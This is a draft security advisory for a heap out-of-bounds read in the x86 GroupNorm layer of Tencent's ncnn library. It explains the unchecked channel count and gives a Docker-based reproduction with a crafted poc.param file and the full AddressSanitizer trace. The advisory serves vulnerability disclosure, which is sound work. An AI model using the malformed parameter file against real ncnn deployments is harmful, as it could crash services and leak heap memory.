All advisories
Draft

GroupNorm Heap Out-of-Bounds Read

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

GroupNorm Heap Out-of-Bounds Read

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/groupnorm_x86.cpp:61 in groupnorm
Sanitizer verdict: unknown-crash

Summary

GroupNorm trusts the channel count declared in the .param file and never compares it with the shape of the tensor it is handed, so a model that declares 24 channels while feeding a single-element blob drives the x86 SIMD reduction 64 bytes into unowned heap and aborts ncnnoptimize. The attacker supplies only a parameter file; ncnnoptimize accepts null as the weight stream. The over-read bytes are summed into the group mean and variance before the process dies.

Detail

GroupNorm::load_param stores channels from parameter key 1 with no cross-check against anything, and GroupNorm_x86::forward_inplace derives its whole iteration geometry from that number rather than from bottom_top_blob:

// src/layer/x86/groupnorm_x86.cpp:354
    const int dims = bottom_top_blob.dims;
    const int elempack = bottom_top_blob.elempack;
    const int channels_g = channels / group;

// src/layer/x86/groupnorm_x86.cpp:382
    if (dims == 1)
    {
        #pragma omp parallel for num_threads(opt.num_threads)
        for (int g = 0; g < group; g++)
        {
            Mat bottom_top_blob_g = bottom_top_blob_unpacked.range(g * channels_g / g_elempack, channels_g / g_elempack);
            const float* gamma_ptr = affine ? (const float*)gamma_data + g * channels_g : 0;
            const float* beta_ptr = affine ? (const float*)beta_data + g * channels_g : 0;
            groupnorm(bottom_top_blob_g, gamma_ptr, beta_ptr, eps, channels_g / g_elempack, 1 * g_elempack, g_elempack, 1);
        }
    }

Mat::range performs no bounds checking, so the slice happily describes more data than the source Mat owns, and the kernel then reads channels * size floats through it:

// src/layer/x86/groupnorm_x86.cpp:44
    for (int q = 0; q < channels; q++)
    {
        const float* ptr0 = ptr + cstep * q * elempack;

        int i = 0;

with the AVX branch at line 61 issuing __m256 _p = _mm256_loadu_ps(ptr0);.

The PoC's GroupNorm gn 1 1 data out 0=1 1=24 3=0 gives group = 1, channels = 24, so channels_g = 24. Because 24 % 8 == 0, g_elempack becomes 8, and the call passes channels = 24 / 8 = 3 and size = 1 * 8 = 8. The input is Input data 0 1 data 0=1 — a single float in ncnn's 84-byte minimum allocation. Iteration q = 2 sets ptr0 = ptr + 16 floats (byte offset 64) and the 32-byte _mm256_loadu_ps runs to byte 96, past the 84-byte region — the read AddressSanitizer reports at region_start + 64.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-groupnorm-heap-out-of-bounds-read && cd ncnn-poc-groupnorm-heap-out-of-bounds-read

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'PARAM'
7767517
2 2
Input data 0 1 data 0=1
GroupNorm gn 1 1 data out 1=24
PARAM

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

=================================================================
==1==ERROR: AddressSanitizer: unknown-crash on address 0x50e000000140 at pc 0x63f835371b18 bp 0x7ffd717a75f0 sp 0x7ffd717a75e0
READ of size 32 at 0x50e000000140 thread T0
    #0 0x63f835371b17 in _mm256_loadu_ps(float const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905
    #1 0x63f835371b17 in groupnorm /ncnn/build/src/layer/x86/groupnorm_x86_avx512.cpp:61
    #2 0x63f835377668 in ncnn::GroupNorm_x86_avx512::forward_inplace(ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/groupnorm_x86_avx512.cpp:390
    #3 0x63f82cfcefd8 in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:711
    #4 0x63f82cfc1b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #5 0x63f82d0219e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #6 0x63f82ceb33c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #7 0x63f82cf30eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #8 0x72bdabba71c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x72bdabba728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #10 0x63f82ceb0624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e000000154 is located 0 bytes after 84-byte region [0x50e000000100,0x50e000000154)
allocated by thread T0 here:
    #0 0x72bdac220f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x63f82cf4568e in fastMalloc /ncnn/src/allocator.h:62
    #2 0x63f82cf4568e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
    #3 0x63f82cf83621 in ncnn::Mat::create(int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:497
    #4 0x63f82cf69c14 in ncnn::Mat::clone(ncnn::Allocator*) const /ncnn/src/mat.cpp:79
    #5 0x63f82cfc7a2d in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:640
    #6 0x63f82cfc1b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #7 0x63f82d0219e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #8 0x63f82ceb33c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #9 0x63f82cf30eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #10 0x72bdabba71c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #11 0x72bdabba728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x63f82ceb0624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: unknown-crash /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905 in _mm256_loadu_ps(float const*)

Credit

Zheng Yu @ DepthFirst